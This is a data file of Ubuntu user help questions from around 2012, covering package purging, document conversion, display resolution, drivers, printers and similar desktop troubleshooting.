2 18:09 /home/vectoruser/.cache/winetricks
171238	using ppa-purge ( with/without -i ) results in suggesting removal of over 100 packages i 'm fairly sure are available in the standard ubuntu repository	i foolishly added the kxstudio ppa quite some time ago . all seemed well for a few months , then problems started showing up , and have been nothing but a pain since . i 've submitted several bug reports and wasted much time only to discover they 've mostly been due to kxstudio 'upgraded ' packages . i now wish to remove the ppa , and every package ever installed by it , either removing the package if it was n't there before , or reverting to another available version if it 's in the ubuntu repository . i have used ppa-purge , both with and without the -i switch , and i get something like this : sudo ppa-purge -i kxstudio-team updating packages lists ppa to be removed : kxstudio-team ppa comm : file 2 is not in sorted order package revert list generated : alsa-tools-gui/oneiric ardour/oneiric audacious/oneiric ffmpeg/oneiric gstreamer0.10-plugins-bad-multiverse/oneiric gstreamer0.10-plugins-bad-multiverse-dbg/oneiric ia32-libs/oneiric jackd/oneiric jackd1/oneiric jackd2/oneiric jackd2-firewire/oneiric libaudclient2/oneiric libaudcore1/oneiric libavcodec52/oneiric libavcodec53/oneiric libavcodec-dev/oneiric libavcodec-extra-53/oneiric libavdevice53/oneiric libavfilter2/oneiric libavformat52/oneiric libavformat53/oneiric libavformat-dev/oneiric libavformat-extra-53/oneiric libavutil50/oneiric libavutil51/oneiric libavutil-dev/oneiric libavutil-extra-51/oneiric libclucene0ldbl/oneiric libffado2/oneiric libflowcanvas5/oneiric libjack0/oneiric libjack-jackd2-0/oneiric libmlt++3/oneiric libmlt4/oneiric libmowgli2/oneiric libpostproc51/oneiric libpostproc52/oneiric libquicktime2/oneiric libswscale0/oneiric libswscale2/oneiric libswscale-dev/oneiric lmms/oneiric lmms-common/oneiric lmms-vst/oneiric mplayer/oneiric muse/oneiric wine1.2/oneiric wine1.3/oneiric zynaddsubfx/oneiric disabling kxstudio-team ppa from /etc/apt/sources.list.d/kxstudio-team-ppa-oneiric.list updating packages lists unable to find an archive `` oneiric '' for the package `` libavcodec52 '' unable to find an archive `` oneiric '' for the package `` libavformat52 '' unable to find an archive `` oneiric '' for the package `` libavutil50 '' unable to find an archive `` oneiric '' for the package `` libpostproc51 '' unable to find an archive `` oneiric '' for the package `` libswscale0 '' unable to find an archive `` oneiric '' for the package `` lmms-vst '' unable to find an archive `` oneiric '' for the package `` libavcodec52 '' unable to find an archive `` oneiric '' for the package `` libavformat52 '' unable to find an archive `` oneiric '' for the package `` libavutil50 '' unable to find an archive `` oneiric '' for the package `` libpostproc51 '' unable to find an archive `` oneiric '' for the package `` libswscale0 '' unable to find an archive `` oneiric '' for the package `` lmms-vst '' the following packages will be downgraded : ffmpeg gstreamer0.10-plugins-bad-multiverse gstreamer0.10-plugins-bad-multiverse-dbg jackd2 { b } jackd2-firewire { b } libavcodec-dev libavcodec-extra-53 { b } libavdevice53 libavfilter2 libavformat-dev libavformat-extra-53 { b } libavutil-dev libavutil-extra-51 { b } libjack-jackd2-0 { b } libpostproc52 libswscale-dev libswscale2 lmms lmms-common wine1.3 { b } the following new packages will be installed : ardour audacious audacious-plugins { a } cmt { a } gtk2-engines-pixbuf { a } jackd1 { b } jackd1-firewire { ab } libaubio2 { a } libaudclient2 libaudcore1 libavcodec53 libavformat53 libavutil51 libbinio1ldbl { a } libbs2b0 { a } libcue1 { a } libguess1 { a } libjack0 { b } liblrdf0 { a } libmlt++3 libmlt-data { a } libmlt4 libmowgli2 libqt3-mt { a } libresid-builder0c2a { a } libsidplay2 { a } libsox-fmt-alsa { a } libsox-fmt-base { a } libsox1b { a } libvamp-sdk2 { a } muse python-pyasn1 { a } python-twisted { a } python-twisted-conch { a } python-twisted-lore { a } python-twisted-mail { a } python-twisted-news { a } python-twisted-runner { a } python-twisted-words { a } wine1.2 the following packages will be removed : lmms-vst { u } 0 packages upgraded , 40 newly installed , 20 downgraded , 1 to remove and 5 not upgraded . need to get 100 mb/101 mb of archives . after unpacking 292 mb will be used . the following packages have unmet dependencies : jackd2-firewire : conflicts : jackd-firewire which is a virtual package . libavformat-extra-53 : conflicts : libavformat53 but 4:0.7.2-1ubuntu1 is to be installed . jackd1-firewire : conflicts : jackd-firewire which is a virtual package . wine1.3 : conflicts : wine1.2 but 1.2.3-0ubuntu1 is to be installed . libjack0 : conflicts : libjack-0.116 which is a virtual package . libavutil-extra-51 : conflicts : libavutil51 but 4:0.7.2-1ubuntu1 is to be installed . libjack-jackd2-0 : conflicts : libjack-0.116 which is a virtual package . conflicts : libjack0 but 1:0.121.0+svn4469-2ubuntu2 is to be installed . jackd1 : conflicts : jack-daemon which is a virtual package . jackd2 : conflicts : jack-daemon which is a virtual package . libavcodec-extra-53 : conflicts : libavcodec53 but 4:0.7.2-1ubuntu1 is to be installed . open : 195 ; closed : 1177 ; defer : 78 ; conflict : 276 othe following actions will resolve these dependencies : remove the following packages : 1 ) acroread 2 ) ia32-libs-multiarch 3 ) libacl1 4 ) libatk1.0-0 5 ) libattr1 6 ) libaudio2 7 ) libavahi-client3 8 ) libavahi-common3 9 ) libc6 10 ) libcairo2 11 ) libcomerr2 12 ) libcups2 13 ) libcupsimage2 14 ) libcurl3 15 ) libdatrie1 16 ) libdb5.1 17 ) libdbus-1-3 18 ) libdrm-intel1 19 ) libdrm-nouveau1a 20 ) libdrm-radeon1 21 ) libdrm2 22 ) libexpat1 23 ) libffi6 24 ) libfontconfig1 25 ) libfreetype6 26 ) libgcc1 27 ) libgcrypt11 28 ) libgdbm3 29 ) libgdk-pixbuf2.0-0 30 ) libgl1-mesa-dri 31 ) libgl1-mesa-glx 32 ) libglapi-mesa 33 ) libglib2.0-0 34 ) libgnutls26 35 ) libgpg-error0 36 ) libgssapi-krb5-2 37 ) libgtk2.0-0 38 ) libice6 39 ) libidn11 40 ) libjasper1 41 ) libjpeg62 42 ) libk5crypto3 43 ) libkeyutils1 44 ) libkrb5-3 45 ) libkrb5support0 46 ) liblcms1 47 ) libldap-2.4-2 48 ) libllvm2.9 49 ) libmng1 50 ) libnspr4 51 ) libnss3 52 ) libpango1.0-0 53 ) libpciaccess0 54 ) libpcre3 55 ) libpixman-1-0 56 ) libpng12-0 57 ) libqt4-dbus 58 ) libqt4-declarative 59 ) libqt4-designer 60 ) libqt4-network 61 ) libqt4-opengl 62 ) libqt4-qt3support 63 ) libqt4-script 64 ) libqt4-scripttools 65 ) libqt4-sql 66 ) libqt4-svg 67 ) libqt4-test 68 ) libqt4-xml 69 ) libqt4-xmlpatterns 70 ) libqtcore4 71 ) libqtgui4 72 ) librtmp0 73 ) libsasl2-2 74 ) libsasl2-modules 75 ) libselinux1 76 ) libsm6 77 ) libsqlite3-0 78 ) libssl1.0.0 79 ) libstdc++6 80 ) libtasn1-3 81 ) libthai0 82 ) libtiff4 83 ) libuuid1 84 ) libx11-6 85 ) libxau6 86 ) libxcb-render0 87 ) libxcb-shm0 88 ) libxcb1 89 ) libxcomposite1 90 ) libxcursor1 91 ) libxdamage1 92 ) libxdmcp6 93 ) libxext6 94 ) libxfixes3 95 ) libxft2 96 ) libxi6 97 ) libxinerama1 98 ) libxrandr2 99 ) libxrender1 100 ) libxss1 101 ) libxt6 102 ) libxxf86vm1 103 ) nspluginviewer 104 ) nspluginwrapper 105 ) wine1.3 106 ) zlib1g keep the following packages at their current version : 107 ) jackd1 [ not installed ] 108 ) jackd1-firewire [ not installed ] 109 ) libavcodec53 [ not installed ] 110 ) libavformat53 [ not installed ] 111 ) libavutil51 [ not installed ] 112 ) libjack0 [ not installed ] leave the following dependencies unresolved : 113 ) ia32-libs recommends ia32-libs-multiarch 114 ) wine1.3-gecko recommends wine1.3 115 ) libgl1-mesa-glx recommends libgl1-mesa-dri ( > = 7.2 ) 116 ) libqt4-dbus recommends qdbus ( = 4:4.8.1-0ubuntu2~oneiric1~ppa2 ) 117 ) libqtgui4 recommends libcups2 accept this solution ? [ y/n/q/ ? ] q abandoning all efforts to resolve these dependencies . abort . i 'm pretty sure some of those packages are very important , i just do n't understand why they need to be removed . other dependency resolution suggestions remove even more packages ! can anyone shed some light on this ?
171243	error converting thousands of documents with libreoffice	i am trying to convert several thousand documents from lwp ( lotus word pro ) to doc . when the converting process gets to around 250 ( to 229 in some cases , 248 in others , 245 , etc.. it gets near 250 ) documents converted it just quits . the terminal lines i am using to convert this are : soffice -- headless -- convert-to doc -- outdir /home/cyrex/work/biopsias/2007 *.lwp or libreoffice -- headless -- convert-to doc -- outdir /home/cyrex/work/biopsias/2007 *.lwp both work but only get to around 250 . i have 60k documents to convert and doing them 200 at a time would take a lot of time . converting them to odt also has the same problem . i have libreoffice version 3.5 update : i have checked to see if the 229 file was the cause . i have also checked if the following or the previous file were the cause . negative . i even deleted the previous 20 files before the 250 barrier and the 20 after it . same problem . i also opened the 229 file , the 228 file and the 230 file with libreoffice with no problem . it just fails randomly before the 250 . update2 : tried with another completely different group of files , this time , doc . again it gets up to less than ~250 . just in case it matters i have the following hardware : cpu - core i7 2600 ram : 16gb hdd : 120gb ssd mobo : intel dz68db os : ubuntu 32 bit
171244	usb boot graphics corrupted on macbook . uefi mode ?	i 'm trying to run 64-bit ubuntu 12.04 off my usb stick on my macbook pro . usb stick is fine afaik , but when it boots i get corrupt graphics after the boot menu , so can only see random blocks of colour . here 's what i did : boot whilst holding option/alt . choose the `` efi boot '' usb icon instead of my normal hdd . it then flashes up saying something very quickly , then gives me the ubuntu menu where i can try ubuntu without installing , install it , or check the disk for defects . if i choose `` try without installing '' the screen goes black for 10 secs or so , then gives me the corrupt bollocks . i assume it 's obviously something to do with the graphics driver . is there anything i can poke with or edit on the usb stick so it 'll force it to run from the usb stick in some kinda sensible/lower performance graphics mode ? i 'm guessing it 's getting over excited and trying to choose some driver that does n't work with either my intel hd graphics or the discrete nvidia 330m . whilst i 'm asking , i do n't suppose any macuntu users out there know whether the `` efi boot '' icon implies it 's trying to boot uefi mode ( which apple 's efi may not fully support ) instead of seeing it as a `` windows '' disk and running with bios emulation ?
171250	disable hud for some applications	i am using hud on 12.04 ubuntu and firefox is crashing for me . i have similar results as per this bug . another thing is that i have 0 addons on firefox , so this is not caused because of the addons . whenever i am using firefox and accidently touch the window key , it crashes the firefox . hud does show options related to the firefox during this time . so my question - is it possible to hide and disable hud for certain applications ? i do n't want to disable entirely as i am using it for other apps .
171251	can i play ogg or wav files using pulseaudio ?	i 'm not totally clear on what pulseaudio does or how i can use it . for example , i have .wav and .ogg sound files that i need to play programatically ( using c/c++ ) . how can i use pluseaudio to do this ? or should i use something else ?
171257	how do i copy files that i just searched for via the command line ?	using ubuntu 12.04 i need help on copying files that were returned from a search with grep . i have many pdf files , so to filter specific named files i am using general grep command as follows . raja @ badfox : ~/desktop/mtech/m.tech ii sem-april 2012 $ grep `` design of fault tolerant systems '' *.pdf binary file nr-design of fault tolerant systems.pdf matches binary file r09-design of fault tolerant systems.pdf matches how do i automatically copy the files returned from the search to another directory ?
171263	where can i find the pictures / music / downloads folder icons ?	first of all , i know this question seems very common . i know the /usr/share/icons/humanity/places folder . so this is not exactly about it . on a fresh install , when you open nautilus , you see your home folder . it has several default folders with special icons , such as downloads , music , pictures , etc . they are also bookmarked , so that you can see them on the sidebar . actually two different icons are displayed : in the main panel , this is the places/64/folder-music.svg that is displayed . in the sidebar , this is places/16/folder-music.svg i deleted this music folder . i created it again , and customized the icon using /usr/share/icons/humanity/places/64/folder-music.svg but in the sidebar , the icon is a resized version of this one , not the 16 version ! how can i recreate the original behaviour ?
171267	fdisk logical partition	i have tried to create a logical partition via fdisk for a flash drive . the problem is that i choose the option -n to create a partition , of course , and fdisk gives me only two options `` extended and primary '' . however , i want an option for logical partitions . moreover , in a topic in the forum , a guy is able to choose logical partition option instead of extended . the topic 's link : http : //ubuntuforums.org/showthread.php ? t=1659376
171271	upgrading kubuntu 11.10 to 12.04 - it want to install ubuntu 12.04 instead	i 'm unable to upgrade using the instructions here : https : //help.ubuntu.com/community/preciseupgrades/kubuntu i 've installed all updates , but i can not see any new version available . i had to change muon-updater to see normal dist upgrades even though 12.04 should be a lts . after changing this , i 'm able upgrade to ubuntu 12.04 lts , not kubuntu . i 'm afraid to just press install ... running the following command ( found on the earlier linked page ) also want 's to upgrade to ubuntu rather than kubuntu.. do-release-upgrade -m desktop -f kde -d any idea what might be wrong ? or should i just go for ubuntu and hope for the best ?
171275	how do i restore a browser session in firefox ?	if i shut down my browser/laptop properly , then open up the browser again , it does n't ask to restore the session . i ca n't add bookmarks to every link i browsed . is there a way that browser can ask whether you want to resume/restore the previous session the next time you launch it ? i am using firefox .
171286	how do i adjust the resolution on a dell gx620 ?	hello i was running ubuntu 10.04 on a desktop dell optiplex gx620 with onboard graphics intel 82945g ( 945g ) , and even then i had to use xrandr to add mode 1280x1024 and edit the files in /etc/gdm , but it worked . support for ubuntu version 10.04 is at an end and i was always getting reminders of it , so i downloaded ubuntu-12.04-desktop-i386.iso burnt the cd and did a clean install of ubuntu 12.04 not a distribution update , now maximum resolution is only 1024x768 . i have updated the kernel now to version 3.5.0-10 ; however , there is no gdm folder in /etc , there is no xorg.conf file in /etc/x11 folder , and when i run xrandr i get the following : jo @ jo-lin : ~ $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 61.0* 800x600 61.0 848x480 0.0 640x480 60.0 when i run cvt i get this result : jo @ jo-lin : ~ $ cvt 1280 1024 # 1280x1024 59.89 hz ( cvt 1.31m4 ) hsync : 63.67 khz ; pclk : 109.00 mhz modeline `` 1280x1024_60.00 '' 109.00 1280 1368 1496 1712 1024 1027 1034 1063 -hsync +vsync then i tried xrandr again several times : jo @ jo-lin : ~ $ xrandr -- newmode `` 1280x1024_60.00 '' 109.00 1280 1368 1496 1712 1024 1027 1034 1063 -hsync +vsync xrandr : failed to get size of gamma for output default jo @ jo-lin : ~ $ xrandr -- addmode default 1280x1024_60.00 xrandr : failed to get size of gamma for output default jo @ jo-lin : ~ $ xrandr -- output default -- mode 1280x1024_60.00 xrandr : failed to get size of gamma for output default xrandr : screen can not be larger than 1024x768 ( desired size 1280x1024 ) jo @ jo-lin : ~ $
171287	how to pass/record audio output as an input device ?	i used to use a mixer of some kind and i ca n't remember which ... i would like to record audio from the output , without leaving the computer . i remember in the juanty days you could easily enable different inputs and outputs as passthroughs of sorts from the sound preferences . how can i achieve this functionality on 10.04 and beyond ? i do n't favor any way how , be it digital , analog , pulse or alsa ... i can support any solution . thanks
171292	ubuntu application publishing	i am having some trouble publishing my first application . i created the application using 'quickly ' and have set up my own ppa , registered a fingerprint , gone through the gpg email security steps , signed the code of conduct agreement etc . after i have generated my application using 'quickly package' i then proceed to try and upload it to my ppa using the command : dput ppa : sdpagent/packages upload-screenshot_0.1_i386.changes this then produces the following error output : checking signature on .changes gpg : no valid openpgp data found . gpg : the signature could not be verified . please remember that the signature file ( .sig or .asc ) should be the first file given on the command line . no signature on /home/stuart/dropbox/python/ubuntu_apps/upload-screenshot_0.1_i386.changes . please could someone advise me on where i should find and put this gpg/sig data ? perhaps i needed to add some options to the 'quickly package ' command ? regards , stuart
171295	livecd ubuntu 12.04 , ca n't open file `` kconfig ''	i am going to try and make this as descriptive as possible so you know what i am looking to do and so it is clear . error message : ubuntu @ ubuntu : ~/desktop/liquidware_beagleboard $ make menuconfig scripts/kconfig/mconf arch/x86/kconfig drivers/staging/kconfig:52 : ca n't open file `` drivers/staging/usbip/kconfig '' make [ 1 ] : *** [ menuconfig ] error 1 make : *** [ menuconfig ] error 2 my situation : i am running ubuntu 12.04 off a livecd on a new thinkcentere with an intel core i5 , 4gb ram , and windows 7 enterprise . i can not install ubuntu onto the computer , but i can run it from the livecd . ( work computer ) i need to compile a kernel built by a company called liquidware for a project i am on . every time i try any make command that error is spat out . i have a laptop running ubuntu 12.04 , but it would run out of memory ( 2gb ram ) . so i know it is just with this computer and the livecd . what i have tried : i have tried this with make menuconfig , make oldconfig , and make xconfig . they all return the error above . i tried doing sudo apt-get update to make sure i was n't missing any patch files . i even did sudo apt-get update -- fix-missing . still no change . i located the folder and the file . both have read and write permissions , including the containing folders too . any help would be greatly appreciated !
171299	completely uninstalling ubuntu 12.04 ?	i installed ubuntu 12.04 with wubi . then after testing it , i decided to uninstall it . i went to control panel and uninstalled ubuntu . when i restarted my computer is still had the dual boot option to go to either windows 7 or ubuntu . when i selected ubuntu , it said it could n't run windows and to put the repair diak . how can i completely uninstall ubuntu form my computer ?
171307	error while making a .deb package with quickly : setup.py install_egg_info failed	i wrote a little program and now i trying to make a .deb package out of it . when i run quickly -- verbose package i get this : quickly -- verbose package /usr/lib/python2.7/dist-packages/gobject/constants.py:24 : warning : g_boxed_type_register_static : assertion `g_type_from_name ( name ) == 0 ' failed import gobject._gobject /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : specified class size for type `pygtkgenericcellrenderer ' is smaller than the parent type 's `gtkcellrenderer ' class size from gtk import _gtk /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : g_type_get_qdata : assertion `node ! = null ' failed from gtk import _gtk setup.py install_egg_info failed an error has occurred when creating debian packaging error : ca n't create or update ubuntu package error : package command failed aborting i read jono bacon 's question on the quickly developer website and he had exactly the same problem as i have , but even though he explained how to fix it i do n't understand what i 'm supposed to do . i 'm new to quickly and to python too . what do i need to do ?
171313	specify the bootstrapped node in maas ?	i am testing out maas in a demo environment of differently specified machines and would like the bootstrap node to be the smaller of the machines . is there a way to specify the bootstrap node ?
171314	how make scanner function of canon mg5250 work ? ( mg5200 series )	i just bought a canon mg5250 multifunction printer because i thought that it would work well with ubuntu , and the printing function is installed using these instructions . but i still need to get the scanner to work and my attempts so far have not helped : thep above instructions do n't do anything : simplescan still says there 's no scanner detected . i found this post in the ubuntu forums but it 's too terse ; it refers to `` patching libsane source '' but does n't explain this . as a beginner , i need more precise instructions . scanimage -l responds with no scanners were identified . sane-find-scanner responds with found usb scanner ( vendor=0x04a9 [ canon ] , product=0x1749 [ mg5200 series ] ) at libusb:001:002 . your usb scanner was ( probably ) detected . it may or may not be supported by sane . question : should i try the approach about `` patching libsane source '' or can you recommend a better/smarter/ simpler solution ? i like simplescan very much for its simplicity so if a recommendation is to switch to some other software , it should be something equally one-click simple .
171315	installing aircrack-ng	ok so i 'm a noob at ubuntu just really started using it today no lie . but i was installing aircrack-ng as seen in this video http : //www.youtube.com/watch ? v=apoahf8tpvk & feature=plcp and all was going fine until i hit hiccup . i looked into the whole `` no such file or directory '' issue on google and thatâs how i came to find this site . i also had the same problem of no such file or directory when i tried to save a new text document to documents . any help at all would be great .
171316	is ubucleaner script still a good idea ?	i wonder to know if should i use ubucleaner script on ubuntu oneiric/precise ?
171317	why does zeitgeist use ~/.local/share/ instead of ~/.cache ?	i have noticed that many applications like chromium , mc , and ubuntu one use one common ~/.cache directory , so why does n't zeitgeist ?
171319	how to fix lag in 'dash home ' ?	i have ubuntu 12.04 . i 'm experiencing large lag within the dash home screen , particularly around the icons and typing lag within search . otherwise it is smooth outside this area . i 've tried various things within ccsm such as disabling blur , detect refresh rate and sync to vblank but still get lag . is this due to my graphics drivers ? some system info : specs : mem : 7.8gib proc : intel core i7 cpu 860 os : 64-bit ssd graphics : geforce 6200le any suggestions are appreciated .
171322	how to change default location of thunderbird cache directory ?	mozilla firefox has the key browser.cache.parent_directory for this but in thunderbird i could n't find it .
171325	compiling objective c code , how to ?	i am trying to compile a program using its source code and i am unable too and the problem seems to happen in the same folder in every ocurrance , and when i check the files , they are all objective c language , could it be that i am missing libraries or programs ? if so which may they be ? i tried researching online and here but all i find is stuff on gcc and g++ but i already have both installed along with the boost library which is another pre-req for this program . here are some of the command line outputs i got : `` g++ '' -o `` phrase-extract/pcfg-score/bin/gcc-4.6/release/debug-symbols-on/link-static/threading-multi/pcfg-score '' -wl , -- start-group `` phrase-extract/pcfg-score/bin/gcc-4.6/release/debug-symbols-on/link-static/threading-multi/pcfg_score.o '' `` phrase-extract/pcfg-score/bin/gcc-4.6/release/debug-symbols-on/link-static/threading-multi/main.o '' `` phrase-extract/pcfg-score/bin/gcc-4.6/release/debug-symbols-on/link-static/threading-multi/tree_scorer.o '' `` phrase-extract/pcfg-common/bin/gcc-4.6/release/debug-symbols-on/link-static/threading-multi/libpcfg_common.a '' -wl , -bstatic -lboost_program_options-mt -lboost_system-mt -lboost_thread-mt -wl , -bdynamic -lsegfault -lrt -wl , -- end-group -g -pthread ... failed gcc.link phrase-extract/pcfg-score/bin/gcc-4.6/release/debug-symbols-on/link-static/threading-multi/pcfg-score ... ... skipped < p/home/rowe/moses/bin > moses_chart for lack of < pmoses-chart-cmd/src/bin/gcc-4.6/release/debug-symbols-on/link-static/threading-multi > moses_chart ... ... skipped < p/home/rowe/moses/bin > moses for lack of < pmoses-cmd/src/bin/gcc-4.6/release/debug-symbols-on/link-static/threading-multi > moses ... ... skipped < p/home/rowe/moses/bin > lmbrgrid for lack of < pmoses-cmd/src/bin/gcc-4.6/release/debug-symbols-on/link-static/threading-multi > lmbrgrid ... ... skipped < p/home/rowe/moses/bin > createondiskpt for lack of < pondiskpt/bin/gcc-4.6/release/debug-symbols-on/link-static/threading-multi > createondiskpt ... ... skipped < p/home/rowe/moses/bin > queryondiskpt for lack of < pondiskpt/bin/gcc-4.6/release/debug-symbols-on/link-static/threading-multi > queryondiskpt ... ... skipped < p/home/rowe/moses/bin > pro for lack of < pmert/bin/gcc-4.6/release/debug-symbols-on/link-static/threading-multi > pro ... ... skipped < p/home/rowe/moses/bin > kbmira for lack of < pmert/bin/gcc-4.6/release/debug-symbols-on/link-static/threading-multi > kbmira ... common.copy /home/rowe/moses/bin/processphrasetable ... skipped < p/home/rowe/moses/bin > processlexicaltable for lack of < pmisc/bin/gcc-4.6/release/debug-symbols-on/link-static/threading-multi > processlexicaltable ... common.copy /home/rowe/moses/bin/queryphrasetable ... skipped < p/home/rowe/moses/bin > querylexicaltable for lack of < pmisc/bin/gcc-4.6/release/debug-symbols-on/link-static/threading-multi > querylexicaltable ... ... skipped < p/home/rowe/moses/bin > extract-ghkm for lack of < pphrase-extract/extract-ghkm/bin/gcc-4.6/release/debug-symbols-on/link-static/threading-multi > extract-ghkm ... ... skipped < p/home/rowe/moses/bin > pcfg-extract for lack of < pphrase-extract/pcfg-extract/bin/gcc-4.6/release/debug-symbols-on/link-static/threading-multi > pcfg-extract ... ... skipped < p/home/rowe/moses/bin > pcfg-score for lack of < pphrase-extract/pcfg-score/bin/gcc-4.6/release/debug-symbols-on/link-static/threading-multi > pcfg-score ... common.copy /home/rowe/moses/lib/liblm.a ... failed updating 12 targets ... ... skipped 12 targets ... ... updated 8 targets ...
171327	alternative to firefox 's tab groups feature for chromium/chrome	i 've been using chromium instead of firefox , but i really do miss the tab groups firefox feature , which is great to group tabs and organize them , it really is a boost on my productivity . are you aware of any add-on which is similar for chrome/chromium ? i 've searched around on chrome 's web store but no luck at the moment .
171328	how to change key bindings for switching workspaces in gnome3 ?	i know that you can go into the system settings- > keyboard- > shortcuts and change the bindings for switching between workspaces in the navigation tab , but this is n't working for me . i can change many other things in shortcuts , like the shortcut for opening terminal , but for some reason i can not change the navigation bindings . is there another way to change this or is there someway to get it to recognize my changes there ? and just so we are clear , i have tried changing it in the navigation tab to ctrl+ ( left/right/up/down ) and f1/f2/f3/f4 and ctrl+alt+super+ ( left/right/up/down ) , but none of those work , it just does n't respond to any of my changes and stays as ctrl+alt+ ( left/right/up/down ) ... . any help would be appreciated , i have been search for 2 days for this and everything says to change it in the system settings- > keyboard- > shortcuts , but it does n't work ...
171334	dash does n't close on click after creating lens with quickly , what 's wrong ?	i 've used quickly to create a lens that interacts with another program when that program is executed , using the following function : def handle_uri ( self , scope , uri ) : os.system ( uri ) but the dash is not closed on click . how do i remedy this ? also , is there a list of all the functions or built in 'shortcuts ' for quickly ?
171345	wireless problem when turned off on windows 7	i 'm having little problems with wireless connection on my ubuntu 12.04 . it works , but when booting on windows 7 , then turning the wireless off ( fn + f5 , in my case ) then rebooting to ubuntu , it just does n't work , also when opening the network drop-down list , i ca n't check the `` enable wireless '' option . i also tried using ifconfig by issuing ifconfig lo up but still does n't work , even though i 'm sure that i only have eth0 and lo . and i tried both of them with ifconfig non of them works ( as far as i know , eth0 is for wired connections , anyway ) . more info : -i 'm running a lenovo g470 laptop . -output of sudo rfkill list : 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : ideapad_bluetooth : bluetooth soft blocked : yes hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : yes if there 's information 's are not sufficient , then feel free to ask for more outputs .
171348	matlab does n't launch , keeps asking for activation	i have just installed matlab r2011a on ubuntu 12.04 using a standalone licence . the installation appears to have worked properly , and i have run the following to get rid of an error that everyone ( including myself ) seemed to be having : sudo ln -s /lib/x86_64-linux-gnu/libc-2.13.so /lib64/libc.so.6 this got rid of the error , but i still have a problem launching matlab . each time i launch it ( by typing `` matlab '' in terminal ) , the mathworks software activation window pops up . i provide the path to the licence file , it appears to activate successfully ( no errors ) , but then matlab does n't launch . if i try to run it again , the same thing happens . does anyone know what might be going wrong ? my last install was 10.04 , and i had absolutely no problems running 2011a .
171350	ubuntu 12.04 synaptic tooltips are white on yellow	ubuntu 12.04/precise gnome classic ( no effects ) metacity gnomishdark theme hi , any ideas/suggestions on how to change the synaptic white on yellow tooltip color ? thanks-in-advance , - robert
171354	directory permission change not working	i 'm sure i 'm missing something quite basic here , but i 'm running ubuntu through virtual box on my mac , and so i need to give my ubuntu user read/write access to the folder shared by the host and guest systems ( named sf_vb_shared_folder ) . i performed and got the following : user @ user-virtualbox : /media $ ls -l total 0 drwxrwx -- - 1 root vboxsf 68 aug 3 07:59 sf_vb_shared_folder user @ user-virtualbox : /media $ sudo chmod ugo+rwx sf_vb_shared_folder user @ user-virtualbox : /media $ ls -l total 0 drwxrwx -- - 1 root vboxsf 68 aug 3 07:59 sf_vb_shared_folder why are the permissions not changing ?
171360	ccc settings are n't saving	i 'm new to linux and i just installed amd drivers using the guide at the unofficial amd wiki : http : //wiki.cchtml.com/index.php/ubuntu_precise_installation_guide # installing_catalyst_manually_.28from_amd.2fati.27s_site.29 i 'm on ubuntu 12.04 64-bit . i installed catalyst version 12.6 , 64-bit . basically , some settings are n't saving and i do n't know if i can fix it with my current setup , or if i need to uninstall the drivers and downgrade to an earlier version . thanks for reading ! description of problem : steps to reproduce : make changes to any of the default settings in the display manager - > dtv - > adjustments tab . click apply , ok. relog/reboot/close and reopen ccc . actual result : settings return to default . the position of the overscan slider remains the same in the gui , but the functionality of the setting returns to default . expected result : settings should be saved after relog/reboot . i have to manually go into ccc every time i relog/reboot to adjust the overscan slider so i do n't have a big black border around my screen .
171363	i need help configuring my screen resolution	so , i 'm running ubuntu 12.04 on my gateway nv78 laptop . the native screen resolution is 1600x900 , but that 's not an option in the settings menu . the two choices i have are 800x600 , or 1024x768 . my graphics card is a mobile intel 4 series express chipset family , if that makes a difference . any help would be immensely appreciated , as i 've been all over google and have found nothing . i should also mention that i 'm brand new to ubuntu , so i 'm not familiar with all the commands and functions and stuff . if you need more information , just let me know , i 'll do my very best to make this easy for you .
171364	can i ( if so how ) uninstall windows after completely installing ubuntu 12.04 from a usb boot drive ?	i have successfully installed linux ubuntu 12.04 of my computer with the usb boot method . when i installed ubuntu , i selected the option where it lets you keep windows on the computer in a separate partition so that you can have both linux and windows as operating systems in the computer . well , i decided i no longer need windows , and i very much want to remove it so linux has more space . can i remove windows at this point and allocate more space for linux , and if so , how can this be done ? thank you .
171365	what is the cheapest , most efficient printer that 's compatible with linux ?	being that my kodak printer ( i will no longer get any more kodak printers ) does n't work properly any more ( see how do i get my kodak esp c310 printer to print pictures ? ) and tomorrow being tax free weekend starting up , i wanted to see what people ( you ) thought would be the best printer to get that 's compatible with linux . one that 's ink lasts a long time and when it does run out , it does n't cost a handful for a refill . ( why i bought my kodak printer to begin with ) i 'm currently using ubuntu 10.04 , and whenever the new elementary comes out , i 'll be using that . so , either way , as long as it runs on linux and is cheap and efficient , i 'll be a happy camper . any suggestions would be greatly appreciated ! : )
171367	firefox pdf embedded plugin	for some reason in firefox i can not read embedded pdfs . it just says a plugin is needed to display the content and then has a link to download plugin . when i click it , it searches for a while and then says no suitable plugins were found . i tried the same thing in chrome and it read it automatically . i 'm using ubuntu 12.04
171374	installing webkit with apt	does ubuntu include a way to install the webkit development files ( headers and libraries ) using apt ? yes , you can install all sorts of webkit ports , like webkit-gtk or webkitqt , but what about just installing plain webkit development files ( webcore and javascriptcore ) ?
171375	unable to locate package bugzilla3	i am on ubuntu 12.04 and am trying to install bugzilla3 . i did : sudo apt-get install bugzilla3 and i get : e : unable to locate package bugzilla3 what 's going on here ?
171384	keyboard backlighting not working on a vaio vpcsb11fx	i installed ubuntu 12.04 on my vaio laptop ( model vpcsb11fx ) last night and one of the issues i 'm having is that the keyboard backlighting does n't work . i saw this question solving a similar problem for 11.10 , but the solution suggested there is n't available to me : /sys/devices/platform/sony-laptop/kbd_backlight does n't exist on my machine . is there anything else i can do or try ?
171391	what 's the difference between gnome , gnome-shell , and gnome-session-fallback ?	i have the ubuntu 12.04 desktop freshly installed . if i execute the following command , what exactly happens ? sudo apt-get install gnome and what is the difference between the above command and installing gnome-shell or gnome-session-fallback ?
171397	limit cpu usage in terms of temperature	i run distributed computing projects , which typically want to use 100 % of the cpu . how do i limit the cpu usage in terms of temperature instead of percent usage ? also , what is the maximum safe temperature to keep an intel i5 running 24/7 ? ( with no cpu limit fahcore_a4 causes this machine to run at 82 degrees celsius . )
